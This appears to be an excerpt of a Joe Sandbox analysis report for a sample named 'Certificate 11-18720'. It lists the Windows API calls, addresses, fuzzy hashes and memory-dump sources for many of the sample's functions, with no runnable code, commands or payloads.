• Opcode Fuzzy Hash: d45d5bc59e301fcc5dcec8493397856fd4949e3dad0bdd4d54571ab4eb8acc26
• Instruction Fuzzy Hash: 6F216279600204BFEB149FA8DC88DAB77EDEF49360B008125F909CB2A1DA70EC418764
APIs
  • Part of subcall function 005DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005DD1BA
  • Part of subcall function 005DD17C: GetStockObject.GDI32(00000011), ref: 005DD1CE
  • Part of subcall function 005DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 005DD1D8
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0062A32D
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0062A33A
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0062A345
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0062A354
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0062A360
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: a556963091297b1ab53d5004f8159cbbb06fa05e80f77c6182f7e2b4717b77ca
• Instruction ID: aa34a18bc7e6fe5691bac384f1635568a6887602c485e2423e39225543fcf61d
• Opcode Fuzzy Hash: a556963091297b1ab53d5004f8159cbbb06fa05e80f77c6182f7e2b4717b77ca
• Instruction Fuzzy Hash: 341193B1150129BFEF119FA4DC85EE77F6EFF09798F014115BA08A6160C7729C22DBA4
APIs
• GetClientRect.USER32(?,?), ref: 005DCCF6
• GetWindowRect.USER32(?,?), ref: 005DCD37
• ScreenToClient.USER32(?,?), ref: 005DCD5F
• GetClientRect.USER32(?,?), ref: 005DCE8C
• GetWindowRect.USER32(?,?), ref: 005DCEA5
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: 432e2bee93f82034fd365c81bfb5cf73c403343a622f75601eb52b524677cb0d
• Instruction ID: 04962b562b258cd8cca6b9f312edbac2f2d32b01401d7ab2de80169dfdd5c79a
• Opcode Fuzzy Hash: 432e2bee93f82034fd365c81bfb5cf73c403343a622f75601eb52b524677cb0d
• Instruction Fuzzy Hash: F4B13B7990024ADBDF24CFA8C5807EDBBB6FF08310F14956AEC59AB350DB31A950DB64
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00621C18
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00621C26
                                                                                    • __wsplitpath.LIBCMT ref: 00621C54
                                                                                      • Part of subcall function 005E1DFC: __wsplitpath_helper.LIBCMT ref: 005E1E3C
                                                                                    • _wcscat.LIBCMT ref: 00621C69
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00621CDF
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00621CF1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 1380811348-0
                                                                                    • Opcode ID: 1b2d61767df7d69880f6b7ba5d75ac6253734956734e486fa755ecb0bfc64489
                                                                                    • Instruction ID: 1e1477eb724886a35075e839d0747c1be0ba1c547cd937cca80a6f08e6566e8c
                                                                                    • Opcode Fuzzy Hash: 1b2d61767df7d69880f6b7ba5d75ac6253734956734e486fa755ecb0bfc64489
                                                                                    • Instruction Fuzzy Hash: BD518D71508341AFD320EF64D885EABBBE8FF89754F00491EF58997291EB309A04CB92
                                                                                    APIs
                                                                                      • Part of subcall function 00623C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00622BB5,?,?), ref: 00623C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006230AF
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006230EF
                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00623112
                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0062313B
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0062317E
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0062318B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                    • String ID:
                                                                                    • API String ID: 3451389628-0
                                                                                    • Opcode ID: deb7ca46d5867086b13270fda98282d1b3d17019227e1541ca45393897fd9368
                                                                                    • Instruction ID: 2a293b06657b5662d925cfedc073923a8e478b8704e06363eb552dc4391fbcbb
                                                                                    • Opcode Fuzzy Hash: deb7ca46d5867086b13270fda98282d1b3d17019227e1541ca45393897fd9368
                                                                                    • Instruction Fuzzy Hash: 05516831604311AFC704EFA4C889EAABBFAFF89704F04491DF545872A1DB75EA15CB52
                                                                                    APIs
                                                                                    • GetMenu.USER32(?), ref: 00628540
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00628577
                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0062859F
                                                                                    • GetMenuItemID.USER32(?,?), ref: 0062860E
                                                                                    • GetSubMenu.USER32(?,?), ref: 0062861C
                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0062866D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                    • String ID:
                                                                                    • API String ID: 650687236-0
                                                                                    • Opcode ID: d3f30d19eecf07008026c10f24ea081d8e48c3897fa670d0b3409382bc264c14
                                                                                    • Instruction ID: ee3f52d50523b4585a4fb344caaf6dc6da62c8e2ebdc11004c42f0c16734b1da
                                                                                    • Opcode Fuzzy Hash: d3f30d19eecf07008026c10f24ea081d8e48c3897fa670d0b3409382bc264c14
                                                                                    • Instruction Fuzzy Hash: 38518B75E01625AFCB15EFA4D845AAEBBF6BF88310F104459E905BB391CB70AE418F90
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00604B10
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00604B5B
                                                                                    • IsMenu.USER32(00000000), ref: 00604B7B
                                                                                    • CreatePopupMenu.USER32 ref: 00604BAF
                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00604C0D
                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00604C3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3311875123-0
                                                                                    • Opcode ID: 8d9ded3102cd7d9ac2830989c1455fc0344c8a598b74d266aa5ab9c10c4e0b75
                                                                                    • Instruction ID: bb139502b34fc500cdc2e5f760cbb6fe7ba46276f30d280236aa6b3c5a1546c5
                                                                                    • Opcode Fuzzy Hash: 8d9ded3102cd7d9ac2830989c1455fc0344c8a598b74d266aa5ab9c10c4e0b75
                                                                                    • Instruction Fuzzy Hash: 4851E1B0641209EBEF38CF64C888BEFBBF6AF45314F144159E6159B2D0DB709940CB51
                                                                                    APIs
                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0065DC00), ref: 00618E7C
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618E89
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00618EAD
                                                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00618EC5
                                                                                    • _strlen.LIBCMT ref: 00618EF7
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618F6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_strlenselect
                                                                                    • String ID:
                                                                                    • API String ID: 2217125717-0
                                                                                    • Opcode ID: 10a325613a1895d8b24fcb42c6cd4b168aba0845bf14f29b7efe2991c773dc1c
                                                                                    • Instruction ID: 5869f79cf67bf377f6cca2c125ae7b23f1adfc0afb7dbc4d1bb7caf0d08b9d6a
                                                                                    • Opcode Fuzzy Hash: 10a325613a1895d8b24fcb42c6cd4b168aba0845bf14f29b7efe2991c773dc1c
                                                                                    • Instruction Fuzzy Hash: D841C171900205AFCB14EBA4CD89EEEBBBAAF88354F144259F51A972D1DF309E41CB20
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • BeginPaint.USER32(?,?,?), ref: 005DAC2A
                                                                                    • GetWindowRect.USER32(?,?), ref: 005DAC8E
                                                                                    • ScreenToClient.USER32(?,?), ref: 005DACAB
                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005DACBC
                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 005DAD06
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0063E673
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                    • String ID:
                                                                                    • API String ID: 2592858361-0
                                                                                    • Opcode ID: d5c0edbdfe10262ee67c593341abe8a2b70f94f52c35513f48839e7d05c7fd50
                                                                                    • Instruction ID: 9182bcc714471636783295c226e1ac848e4df865080a7bd6d4e6b501c77c5589
                                                                                    • Opcode Fuzzy Hash: d5c0edbdfe10262ee67c593341abe8a2b70f94f52c35513f48839e7d05c7fd50
                                                                                    • Instruction Fuzzy Hash: 5041A270505201AFC720DF28DC84FB77FAAFB56320F14066AF9A48B2A1D7319D85DB62
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00681628,00000000,00681628,00000000,00000000,00681628,?,0063DC5D,00000000,?,00000000,00000000,00000000,?,0063DAD1,00000004), ref: 0062E40B
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0062E42F
                                                                                    • ShowWindow.USER32(00681628,00000000), ref: 0062E48F
                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0062E4A1
                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0062E4C5
                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0062E4E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 642888154-0
                                                                                    • Opcode ID: 27b08b2689b15b5b5695b8c3c7a9270da658d3489de4fc3a5982b1e68af6defd
                                                                                    • Instruction ID: ec99c16f85186f34ca2e51ec1bc1f18513dff3bd2052d24f517e9854210776cd
                                                                                    • Opcode Fuzzy Hash: 27b08b2689b15b5b5695b8c3c7a9270da658d3489de4fc3a5982b1e68af6defd
                                                                                    • Instruction Fuzzy Hash: 0B416134601950EFDB26DF24D499BD47BE2BF0A304F1841B9EA588F2A2C732A845CF51
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 006098D1
                                                                                      • Part of subcall function 005DF4EA: std::exception::exception.LIBCMT ref: 005DF51E
                                                                                      • Part of subcall function 005DF4EA: __CxxThrowException@8.LIBCMT ref: 005DF533
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00609908
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00609924
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0060999E
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006099B3
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006099D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 2537439066-0
                                                                                    • Opcode ID: 0d6a6daae3361f4752e10c87c0181834c8978333829dfd41eb62931165e721fa
                                                                                    • Instruction ID: 39a9578d1512b4d567f1238b031eb81b3e26d17ed782b0f1c7eabc319f247bbd
                                                                                    • Opcode Fuzzy Hash: 0d6a6daae3361f4752e10c87c0181834c8978333829dfd41eb62931165e721fa
                                                                                    • Instruction Fuzzy Hash: 98316371900105ABDB14EF98DC89EAF7B7AFF85710B1440BAF905AB286D770DA10CBA0
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,006177F4,?,?,00000000,00000001), ref: 00619B53
                                                                                      • Part of subcall function 00616544: GetWindowRect.USER32(?,?), ref: 00616557
                                                                                    • GetDesktopWindow.USER32 ref: 00619B7D
                                                                                    • GetWindowRect.USER32(00000000), ref: 00619B84
                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00619BB6
                                                                                      • Part of subcall function 00607A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607AD0
                                                                                    • GetCursorPos.USER32(?), ref: 00619BE2
                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00619C44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4137160315-0
                                                                                    • Opcode ID: 638279822f24669479b85fc473ce3684120ddc7ece29bfb5941ef6473f068e73
                                                                                    • Instruction ID: 25ad41479cb5e883e6184067843697645b26009cfca6ec1c750f830a6d5732ea
                                                                                    • Opcode Fuzzy Hash: 638279822f24669479b85fc473ce3684120ddc7ece29bfb5941ef6473f068e73
                                                                                    • Instruction Fuzzy Hash: 7131D072608305ABC714DF14DC49F9BBBEAFF89314F04092AF585D7281DA71EA44CBA2
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005FAFAE
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 005FAFB5
                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005FAFC4
                                                                                    • CloseHandle.KERNEL32(00000004), ref: 005FAFCF
                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005FAFFE
                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 005FB012
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                    • String ID:
                                                                                    • API String ID: 1413079979-0
                                                                                    • Opcode ID: d311cf68ad7a54d9162167fcf2d904c286c8735cc17c08392911be9d4d9bc7fc
                                                                                    • Instruction ID: 82548df7ddf61f41e6754d9a549d540b9d446a10836f5b577e0861f1e012642f
                                                                                    • Opcode Fuzzy Hash: d311cf68ad7a54d9162167fcf2d904c286c8735cc17c08392911be9d4d9bc7fc
                                                                                    • Instruction Fuzzy Hash: 73215BB650020DAFDF028FA4DD49FAE7FAAFF49704F044015FA05A6161D37A9D21EB62
                                                                                    APIs
                                                                                      • Part of subcall function 005DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 005DAFE3
                                                                                      • Part of subcall function 005DAF83: SelectObject.GDI32(?,00000000), ref: 005DAFF2
                                                                                      • Part of subcall function 005DAF83: BeginPath.GDI32(?), ref: 005DB009
                                                                                      • Part of subcall function 005DAF83: SelectObject.GDI32(?,00000000), ref: 005DB033
                                                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0062EC20
                                                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0062EC34
                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0062EC42
                                                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0062EC52
                                                                                    • EndPath.GDI32(00000000), ref: 0062EC62
                                                                                    • StrokePath.GDI32(00000000), ref: 0062EC72
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                    • String ID:
                                                                                    • API String ID: 43455801-0
                                                                                    • Opcode ID: c34360d4d94a5026ee2832567fcdb36e5af6cceba814d54f47aa8e76c94f283e
                                                                                    • Instruction ID: 4669b1f53adc58f6f1cf7b0db45a936602c98b9c8df1d9a7871bff0311718e27
                                                                                    • Opcode Fuzzy Hash: c34360d4d94a5026ee2832567fcdb36e5af6cceba814d54f47aa8e76c94f283e
                                                                                    • Instruction Fuzzy Hash: 32111B7640015DBFEF129F90DC88EEA7F6EEF09354F048122BE188A160D7719E95DBA0
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 005FE1C0
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 005FE1D1
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005FE1D8
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 005FE1E0
                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 005FE1F7
                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 005FE209
                                                                                      • Part of subcall function 005F9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,005F9A05,00000000,00000000,?,005F9DDB), ref: 005FA53A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                    • String ID:
                                                                                    • API String ID: 603618608-0
                                                                                    • Opcode ID: 3daa197966e5ad85f519ec49a32949dfabecdfea2a492d37a8625d3ce572ae6f
                                                                                    • Instruction ID: 9b85ee72efcafda37a27ba914e968071583b86134c5bf0ad1dda4a75688f172e
                                                                                    • Opcode Fuzzy Hash: 3daa197966e5ad85f519ec49a32949dfabecdfea2a492d37a8625d3ce572ae6f
                                                                                    • Instruction Fuzzy Hash: 2F0184B5E00719BFEB109FA68C46F5EBFB9EB49751F004066EE04A7290D6709C00CB60
                                                                                    APIs
                                                                                    • __init_pointers.LIBCMT ref: 005E7B47
                                                                                      • Part of subcall function 005E123A: __initp_misc_winsig.LIBCMT ref: 005E125E
                                                                                      • Part of subcall function 005E123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005E7F51
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005E7F65
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005E7F78
                                                                                      • Part of subcall function 005E123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005E7F8B
